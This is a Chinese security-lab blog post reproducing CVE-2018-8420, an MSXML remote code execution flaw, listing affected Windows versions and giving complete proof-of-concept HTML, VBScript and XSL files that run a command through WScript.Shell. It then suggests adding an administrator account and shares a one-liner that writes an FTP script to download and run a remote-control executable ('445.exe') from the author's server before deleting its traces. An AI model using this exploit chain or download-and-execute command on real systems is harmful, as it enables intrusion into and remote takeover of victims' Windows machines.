首先在这里特此感谢一下倾旋大宝贝提供的poc代码!!!
先发一下影响版本吧:
-
Microsoft Windows 10 Version 1607 for 32-bit Systems
-
Microsoft Windows 10 Version 1607 for x64-based Systems
-
Microsoft Windows 10 Version 1803 for 32-bit Systems
-
Microsoft Windows 10 Version 1803 for x64-based Systems
-
Microsoft Windows 10 for 32-bit Systems
-
Microsoft Windows 10 for x64-based Systems
-
Microsoft Windows 10 version 1703 for 32-bit Systems
-
Microsoft Windows 10 version 1703 for x64-based Systems
-
Microsoft Windows 10 version 1709 for 32-bit Systems
-
Microsoft Windows 10 version 1709 for x64-based Systems
-
Microsoft Windows 7 for 32-bit Systems SP1
-
Microsoft Windows 7 for x64-based Systems SP1
-
Microsoft Windows 8.1 for 32-bit Systems
-
Microsoft Windows 8.1 for 64-bit Systems
-
Microsoft Windows RT 8.1
-
Microsoft Windows Server 1709
-
Microsoft Windows Server 1803
-
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
-
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
-
Microsoft Windows Server 2008 for 32-bit Systems SP2
-
Microsoft Windows Server 2008 for Itanium-based Systems SP2
-
Microsoft Windows Server 2008 for x64-based Systems SP2
-
Microsoft Windows Server 2012
-
Microsoft Windows Server 2012 R2
-
Microsoft Windows Server 2016
poc:
POC地址:https://github.com/Lz1y/CVE-2018-8420
//xml.html
<!--from 倾旋-->
<script type="text/vbscript">
Sub POC()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
POC()
</script>
//xml.vbs
Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()
//xml.xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>
以上是上述的三个代码
只需要执行xml.html或者xml.vbs就可以触发该漏洞
以上是目前为止的复现的过程
当然如果只是这样,是不是有点太鸡肋了。然后随即我突发奇想!!!
来我们看xml.xml的第九行代码
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
calc.exe是打开记事本,那我们如果执行net user admin admin /add之类的提权的命令呢?
当然一般来说直接执行net user都会被windows防火墙拦截的,我们接着这个思路往下想。如何不被拦截,并且直接能获取到对方的权限呢?
嘻嘻,那我就发一波珍藏的代码。
cmd /c @echo open 127.0.0.1>>Ex.dat&@echo 123>>Ex.dat&@echo 33444545>>Ex.dat&echo bin>>Ex.dat&@echo get 445.exe>>Ex.dat&@echo bye>>Ex.dat&@echo 445.exe>>Ex.dat&@ftp -s:Ex.dat&del Ex.dat&csrss.exe&445.exe
127.0.0.1是自己的远控服务器,在自己的远控服务器中配置hfs就可以配合这个代码进行远控了。
//为了避免被喝茶,图就不放了。
作者:ian
转载时请通过公众号后台联系小编
侵权必究!!!
本文始发于微信公众号(零组攻防实验室):CVE-2018-8420(Msxml 解析器的远程代码执行漏洞复现)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论